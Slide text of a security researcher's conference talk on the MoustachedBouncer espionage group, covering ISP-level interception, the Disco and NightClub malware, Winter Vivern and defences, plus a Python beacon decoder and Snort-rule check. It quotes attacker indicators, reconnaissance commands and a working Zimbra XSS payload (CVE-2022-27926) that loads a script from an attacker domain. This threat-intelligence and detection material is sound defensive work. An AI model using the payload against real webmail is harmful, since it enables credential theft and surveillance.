###### Black Hat USA – 2023-08-10

## MoustachedBouncer

###### AitM-powered surveillance via Belarus ISPs

Matthieu Faou, Senior Malware Researcher

-----

###### Matthieu Faou

- Senior Malware Researcher
- Investigating targeted attacks since 2016
- RE / Threat hunting / CTI
- matthieu.faou@eset.com

-----

###### Agenda

1: MoustachedBouncer
2: AitM
3: NightClub
4: Winter Vivern
5: Defense

-----

#### 1: MoustachedBouncer

-----

###### MoustachedBouncer in short

- Initial access: AitM
- Languages: C++, Go and .NET
- Command and control: SMTP/IMAP, DNS and SMB
- Turla

-----

###### Attribution

- Russian speakers
- Belarus
- Surveillance of foreign diplomats in Belarus

###### Assessment: aligned with the interests of Belarus

-----

#### 2: Adversary-in-the-middle attacks

-----

#### How does MoustachedBouncer use AitM?

Indicators shown in the compromise chain, in the order they appear on the slides:

```
msftconnecttest.com
updates.microsoft[.]com
MicrosoftUpdate845255.exe
\\35.214.56[.]2\OfficeBroker\OfficeBroker.exe
```

-----

#### AitM: compromised router or ISP?

-----

#### Residential IP addresses

-----

#### Deep Packet Inspection in Belarus

###### SORM

-----

#### Assessment: ISP level

-----

###### Disco

- Go
- 2020
- AitM

-----

###### Disco operation

- Linux machine (Kali Linux)
- Execute spying plugins
- SMB shares: exfiltrate collected data

-----

###### Plugins - SMB shares

```
\\209.19.37[.]184\driverpack\aact.exe
\\59.6.8[.]25\outlooksync\outlooksync.exe
\\52.3.8[.]25\oracle\oracleTelemetry.exe
\\globaltelemetry[.]org\info\driverconfigurator.exe
\\facebooklogger[.]org\logs\logger.exe
\\hotkeysstatus[.]com\statuses\checkme.exe
```

```
whois hotkeysstatus.com
No match for domain "HOTKEYSSTATUS.COM".
```

117.61.84[.]5

-----

###### Disco capabilities

- LPE: CVE-2021-1732
- Take screenshots
- PowerShell scripts
- Plug-ins: recent file stealer
- Reverse proxy (revsocks)

-----

#### 3: NightClub

-----

###### NightClub

- C++
- 2014
- VPN

-----

###### Capabilities

- File stealer: .doc, .docx, .xls and .pdf
- C&C by emails: SMTP (CSmtp library)

-----

### 2020-2022 variant

- Shared code with past versions
- Orchestrator: svhvost.exe
- Module agent: schvost.exe

-----

###### Configuration

```
%APPDATA%\Microsoft\def\Gfr45.cfg
```

- RSA, hardcoded key

Configuration layout (values are left empty on the slides):

```
{
  "main": {
    "agent_name": "",
    "server_name": "",
    "auto_del": {
      "enabled": ,
      "days":
    }
  },
  "storage": {
    "path": "",
    "max_size": ,
    "stop at limit":
  },
  "transport": {
    "client_mail": "",
    "pass": "",
    "control_mail": "",
    "smtp": "",
    "pop3": "",
    "server_port": ,
    "use_ssl": ,
    "max_file_size": ,
    "max_daily_traffic":
  },
  "modules": [
    {
      "name": "",
      "enabled": ,
      "max_size": ,
      "file": ""
      // [Other fields depending on the module]
    }
  ]
}
```

-----

###### NightClub plugins

- INI
- Masquerade
- Export: Start or Starts
- JSON

-----

###### Plugins

- Audio recorder
- Screenshotter
- Keylogger
- DNS-tunneling backdoor

-----

#### DNS-tunneling backdoor

-----

###### Requests

```
xZW1wdHkx.11.1.1.cid
```

Decoded payload: `empty`

-----

###### Replies

```
xYzpcd2luZG93c1xzeXN0ZW0zMlxjYWxjLmV4ZQx.27.2.1.calc
```

Slide annotations on the reply: Command ID; decoded payload `c:\windows\system32\calc.exe`; command name (useless)

-----

###### NightClub C&C servers ↔ Winter Vivern C&C servers

- Registrar, hosting provider & network scanning
- Unique pattern

-----

#### 4: Winter Vivern

-----

#### Typical compromise chain

```
tasklist
whoami
arp -a
dir
```

-----

#### And some CVEs!

```
https:///public/error.jsp?errCode= onload=if(!document.getElementById("x67xasd765")){window.x=document.createElement('script');window.x.id="x67xasd765"; window.x.src='https://oscp-avanguard[.]com/5026dbbkj2KJ21fr_[redacted]_Fas2/auth.js'; document.body.appendChild(window.x);}>&accountName=
```

###### CVE-2022-27926

-----

###### Winter Vivern

- Government staff: Europe and Asia
- MoustachedBouncer collaborator
- Backdoor: PowerShell
- Phishing for credentials: Zimbra

-----

#### 5: Defense

-----

###### Defensive measures

- Update webmail / Internet-facing services
- SMB: deny to external
- VPN: to prevent AitM

-----

###### DNS-tunneling detection

```
alert udp any any -> any 53 \
  (msg:"Possible beacon for MoustachedBouncer NightClub DNS-tunneling backdoor";\
  gid:45534554; sid:45375000; rev:1;\
  metadata: author "ESET Research", date "2022-10-21",\
  copyright "ESET Research";\
  content:"|78 5a 57 31 77 64 48 6b 78 02 31 31 01 31 01 31 03 63 69 64|"; offset:13;)
```

The content bytes are the wire-encoded labels of the beacon name:

```
xZW1wdHkx.11.1.1.cid
```

-----

###### MoustachedBouncer

- AitM capabilities
- Active since 2014
- Target foreign diplomats in Belarus
- Related to Belarus-aligned Winter Vivern

-----
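As an added example (not code from the talk or from ESET), this ties the NightClub DNS-tunneling beacon format shown in section 3 to the Snort rule in the Defense section: it decodes the first label of a request or reply, splits the remaining fields, and re-implements the rule's `content`/`offset:13` check against a constructed DNS query. The "x"-delimited, unpadded-base64 layout of the first label is inferred from the two samples on the slides; the field names, the A-record query type and the transaction ID are my assumptions.

```python
import base64
import struct

# Pattern from the Snort rule on the Defense slide: the wire-encoded labels of
# xZW1wdHkx.11.1.1.cid without the first label-length byte (offset:13 skips it).
RULE_CONTENT = bytes.fromhex("785a57317764486b780231310131013103636964")


def decode_payload(label: str) -> bytes:
    """First label = 'x' + base64 without padding + 'x'.
    Assumption inferred from the two samples on the slides, not from the binary."""
    if len(label) < 2 or label[0] != "x" or label[-1] != "x":
        raise ValueError("label is not in the NightClub beacon format")
    b64 = label[1:-1]
    return base64.b64decode(b64 + "=" * (-len(b64) % 4))


def parse_name(name: str) -> dict:
    """Split a beacon name into payload, numeric fields and trailing tag.
    The slides label one numeric field 'Command ID' and the trailing tag of a
    reply the (useless) command name; which number is the ID is not stated."""
    labels = name.rstrip(".").split(".")
    return {
        "payload": decode_payload(labels[0]),
        "numbers": [int(n) for n in labels[1:-1]],
        "tag": labels[-1],
    }


def build_query(name: str, txid: int = 0x1234) -> bytes:
    """Constructed minimal DNS A query (12-byte header, QNAME, QTYPE, QCLASS)
    used to exercise the rule; the real beacon's query type is not on the slides."""
    header = struct.pack(">HHHHHH", txid, 0x0100, 1, 0, 0, 0)
    qname = b"".join(bytes([len(lab)]) + lab.encode() for lab in name.split("."))
    return header + qname + b"\x00" + struct.pack(">HH", 1, 1)


def matches_rule(udp_payload: bytes) -> bool:
    """Same test as content:"|...|"; offset:13; in the rule: the 20 bytes must
    occur at or after byte 13 of the UDP payload (12-byte header + length byte)."""
    return udp_payload.find(RULE_CONTENT, 13) != -1


if __name__ == "__main__":
    for n in ("xZW1wdHkx.11.1.1.cid",
              "xYzpcd2luZG93c1xzeXN0ZW0zMlxjYWxjLmV4ZQx.27.2.1.calc"):
        print(n, "->", parse_name(n), "rule hit:", matches_rule(build_query(n)))
```

Note that only the request beacon trips the rule: the reply name carries a different first label, so the rule as written detects the check-in, not the tasking.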